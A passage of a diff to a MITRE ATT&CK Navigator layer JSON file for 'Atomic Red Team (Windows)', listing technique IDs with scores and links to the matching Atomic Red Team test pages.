c-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://githu